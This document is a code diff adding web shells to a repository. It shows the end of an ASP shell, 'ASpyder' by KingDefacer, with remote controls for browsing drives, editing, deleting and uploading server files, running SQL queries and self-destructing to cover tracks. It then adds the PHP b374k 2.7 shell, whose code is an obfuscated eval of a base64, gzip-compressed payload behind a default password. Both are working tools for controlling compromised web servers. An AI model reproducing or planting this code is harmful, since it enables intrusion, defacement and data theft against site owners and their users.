+    </td>
+	<td>XXXXXX</td><td>
+	<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by KingDefacer</TT></font></center>
+	</td></tr></table>
+<table><tr><td><%If Request.Form("chkXML") = "on"  Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
+<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
+</body>
+</html>
+<%
+		set myDBConnection = nothing
+		set rs2 = nothing
+		set rs = nothing
+'-------------
+response.End()
+end if
+'QUERY ANALYSER -- STOP
+%>
+<title><%=MyPath%></title>
+</head>
+<body bgcolor=black text=white topAprgin="0">
+<!-- Copyright Vela iNC. Apr2003 [alturks.com] Edited By KingDefacer-->
+<%
+		Response.Flush
+'Code Optimisation START
+select case request.form("cmd")
+	case ""
+		If request.form("dirStuff")<>"" then
+			Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
+		Else
+			Response.Write "<font face=webdings size=+3 color=#ff8300>&#1570;</font>"
+		End If
+	case "   Copy   "
+	' ---Copy From Folder routine Start
+		If Request.Form("Fname")="" then
+		Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
+			err.number=424
+		Else
+			Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
+			fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
+			Response.Flush
+		End If
+	' ---Copy From Folder routine Stop
+	case "  Copy "
+	' ---Copy Too Folder routine Start
+		If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
+			Response.Flush
+			fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
+		Else
+		Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
+			err.number=424
+		End If
+	' ---Copy Too Folder routine Stop
+	case "Delete"		'two of this
+	if request.form("todelete")<>"" then
+	' ---File Delete start
+		If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
+		Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
+			Response.Flush
+			fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
+				%>+++DONE+++</font><BR><HR>
+				<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
+			<%Response.End
+		End If
+		If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
+			Response.Flush
+			fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
+		Else
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
+			err.number=424
+		End If
+	' ---File Delete stop
+		Else If request.form("dirStuff")<>"" then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
+			fso.DeleteFolder MyPath & "\" & request.form("DirName")
+		end if
+	End If
+
+	case "Edit/Create"
+%>
+<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
+    <td bgcolor="#000000" valign="bottom">
+	<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
+	</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
+<%
+ 		' fetch file information 
+		Set f = fso.GetFile(pathname) 
+%>
+file Type: <%=f.Type%><BR>
+file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
+file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.datecreated,3)%><BR>
+last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime(f.datelastmodified,3)%><BR>
+last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime(f.datelastaccessed,3)%><BR>
+file Attributes: <%=f.attributes%><BR>
+<%
+	Set f = Nothing
+	response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
+		'read the file
+		
+		Set f = fso.OpenTextFile(pathname)
+		If NOT f.AtEndOfStream Then fstr = f.readall
+		f.Close
+		Set f = Nothing
+		Set fso = Nothing
+		response.write "<TABLE><TR><TD>" & VBCRLF
+		response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
+		response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
+		response.write "</TD></TR></TABLE>" & VBCRLF
+%>
+<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
+<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
+<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
+</FORM></td></tr></table><BR>
+<%
+response.end
+
+	case "Create"
+		Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
+		fso.CreateFolder MyPath & "\" & request.form("DirName")
+
+	case "Save As"
+		Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
+		Set f = fso.CreateTextFile(Request.Form("pathname"))
+		f.write Request.Form("FILEDATA")
+		f.close
+end select
+'Code Optimisation STOP
+' ---DRIVES start here
+	If request.querystring("getDRVs")="@" then
+%>
+<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
+<tr><td><Font face=arial size=-1>Available Drive Information:</font>
+</td></tr><tr><td bgcolor=black >
+<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
+<%For Each thingy in fso.Drives%>
+<tr><td><tt>
+<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
+<%Next%>
+</td></tr></table>
+</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
+<%
+	Response.end
+	end if
+' ---DRIVES stop here
+%>
+<HEAD>
+<SCRIPT Language="VBScript">
+sub getit(thestuff)
+if right("<%=showPath%>",1) <> "\" Then
+   document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
+Else
+   document.myform.txtpath.value = "<%=showPath%>" & thestuff
+End If
+document.myform.submit()
+End sub
+</SCRIPT>
+</HEAD>
+<%	
+'---Report errors
+select case err.number
+	case "0"
+	response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
+
+	case "58"
+	response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
+
+	case "70"
+	response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
+
+	case "76"
+	response.write "<font face=arial size=-1 color=red>Path not found...</font>"
+
+	case "424"
+	response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
+	
+	case else
+	response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
+
+end select
+'---Report errors end
+%>
+<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by KingDefacer</TT></font></center>
+<font face=Courier>
+<table><tr><td>
+<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
+<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
+<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
+<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
+<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value="  View  " >
+</td></tr></form></table>
+</td><td><center>
+<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
+<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
+<tr><td bgcolor=black  align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....KingDefacer!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
+</td></tr></table>
+<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
+<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
+<select size=1 name=ToDelete >
+<option>------------------------------</option>"
+<%
+fi=0
+For each file in folder.Files
+	Response.Write "<option>" & file.name & "</option>"
+fi=fi+1
+next
+	Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
+	Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
+	Response.Write "<option>------------------------------</option>"
+For each file in fileCopy.Files
+	Response.Write "<option>" & file.name & "</option>"
+next
+	Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=""  Copy "" ></form></td></tr></Table>"
+Response.Flush
+' ---View Tree Begins Here
+	Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
+fo=0
+	Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
+
+For each fold in folder.SubFolders '-->FOLDERz
+fo=fo+1
+	Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
+Next
+%>
+<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
+<table bgcolor=#505050 cellspacing=4><tr><td>
+<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
+<tr><td align=right ><input type=text size=20 name=DirName><BR>
+<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
+</tr></td></table></form>
+<%
+Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
+Response.Flush
+%>
+	<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
+<%
+	Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
+For each file in folder.Files '-->FILEz
+	Response.Write "<option value=""" & file.name & """>&nbsp;&nbsp;" & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
+Next
+	Response.write "</select>"
+	Response.write "<br><input type=submit name=cmd value=""   Copy   ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
+%>
+	</form>
+<%
+	Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
+' ---View Tree Ends Here
+' ---Upload Routine starts here
+%>
+	<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
+<table bgcolor="#505050" cellpadding="8">
+  <tr>
+    <td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
+    <input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
+
+	&nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
+	</font></td>
+  </tr>
+</table>
+<BR>
+<table bgcolor="#505050" cellpadding="6">
+  <tr>
+    <td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
+    YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBRARY TO
+    FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
+    EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
+  </tr>
+</table>
+	</form>
+<%
+' ---Upload Routine stops here
+%>
+
+</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
+</body></html>
diff --git a/php/b374k-2.7.php b/php/b374k-2.7.php
new file mode 100644
index 0000000..d103567
--- /dev/null
+++ b/php/b374k-2.7.php
@@ -0,0 +1,10 @@
+<?php
+/*
+	b374k 2.7
+	Jayalah Indonesiaku
+	(c)2013 
+	http://code.google.com/p/b374k-shell
+
+*/
+$s_pass = "0de664ecd2be02cdd54234a0d1229b43"; // shell password, fill with password in md5 format to protect shell, default : b374k
+$s_func="cr"."eat"."e_fun"."cti"."on";$b374k=@$s_func('$x,$y','ev'.'al'.'("\$s_pass=\"$y\";?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$b374k("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